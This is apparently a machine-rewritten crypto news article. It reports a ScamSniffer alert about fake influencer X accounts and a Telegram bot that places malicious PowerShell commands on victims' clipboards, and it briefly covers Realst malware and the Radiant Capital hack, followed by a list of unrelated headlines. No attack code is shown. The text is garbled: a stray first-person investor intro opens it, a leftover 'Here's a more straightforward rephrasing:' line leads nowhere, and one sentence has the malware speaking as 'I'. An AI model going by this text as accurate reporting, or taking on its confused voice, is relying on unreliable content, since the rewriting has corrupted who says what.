As a seasoned crypto investor with a few battle scars to show for it, these relentless attacks on our digital assets are becoming as predictable as the rising and falling of the market itself. I’ve seen my fair share of scams, from pump-and-dump schemes to phishing attempts, but this latest one using fake influencer accounts and malicious Telegram bots is a new low.
Malicious individuals are employing complex strategies involving bogus X account setups and harmful Telegram bots to execute cryptocurrency-theft malware.
Security company ScamSniffer has issued an alert about a fresh scam aimed at cryptocurrency users. This scam involves impersonating well-known figures from the crypto sphere, and then emptying victims’ wallets through subtle malware.
The swindlers initiate their scheme by fabricating fraudulent X accounts, pretending to be well-known cryptocurrency influencers. They then propagate Telegram groups, claiming these offer investment guidance. These groups are frequently marketed as “exclusive,” and they are often publicized under the posts of the influencers the scammers are mimicking to appear authentic.
When newcomers to the group click on the invite link, they are prompted to confirm their presence using a Telegram bot named “OfficialSafeguardBot”, as per ScammSniffer’s assessment, this bot creates a sense of urgency by providing users with minimal time to complete a captcha.
In this deceptive authentication procedure, the automated system secretly introduces harmful PowerShell commands (a scripting language utilized for automating tasks in Windows) onto the victim’s clipboard. Unwary victims are then led to believe they must execute these commands on their Windows systems as part of the verification process requirement that is suggested by the bot. Here’s a more straightforward rephrasing:
As reported by ScamSniffer, there’s been an uptick in instances where hackers have employed similar strategies to swipe users’ private keys. Remarkably, this malware has slipped past numerous antivirus systems, although VirusTotal has identified it as harmful.
For self-protection, it’s recommended that users employ hardware wallets, refrain from running unfamiliar commands, and abstain from installing software that hasn’t been verified.
According to the latest findings, the report is consistent with an earlier alert concerning a significant increase in fraudulent X accounts on ScamSniffer during December. Importantly, it’s been observed that impersonation accounts have experienced a rise of more than 87% since November. Regrettably, two individuals suffered financial losses amounting to over $3 million after clicking harmful links distributed through some of these fraudulent profiles.
Recently, cybercriminals have been more frequently employing malicious software aimed at stealing cryptocurrency. This escalation occurs concurrently with Bitcoin reaching $100,000 and an overall increase in altcoins, which makes the crypto market increasingly attractive to fraudsters.
On December 9th, Cado Security Labs identified the Realst malware tricking users into infecting their own systems. This was done through a deceptive meeting application that users were convinced they needed to download, either for a genuine business prospect or communication with a trusted associate, following social engineering tactics.
Upon deployment, I find myself unobtrusively pilfering cryptocurrency assets, browser saved credentials, banking card details, and other confidential information as part of my operation.
In October, Radiant Capital, a decentralized finance protocol, suffered over $50 million in losses when the systems of some developers were hacked through a malicious PDF file hidden within a zip file. The attack was carried out using social engineering tactics, with the infected file being spread via Telegram by an imposter posing as a trusted former contractor.
Read More
- 15 Charged for converting Drug Cartels’ Cash into Cryptocurrency in U.S.
- OREO Unveils Six New Products for 2025
- PYTH PREDICTION. PYTH cryptocurrency
- XRP Price Eyes $2 Support Level Amidst Market Correction
- Paul Atkins to Replace Gary Gensler as Next SEC Chair?
- ‘Brides’ Finds a Distributor in Neon for Latest New Vampire Horror Movie
- TROTOAR Gallery Bridges Local and Global Art with ‘That’s What’s Up!’
- ‘Fast and Furious’ Star Paul Walker Remembered 11 Years After His Death
- Ben Affleck And Matt Damon Are Back To Work Together, And An Insider Weighed In On Their Longtime Connection
- Apple Lands Anya Taylor-Joy Led Drama ‘Lucky,’ Based on Bestseller
2024-12-11 10:45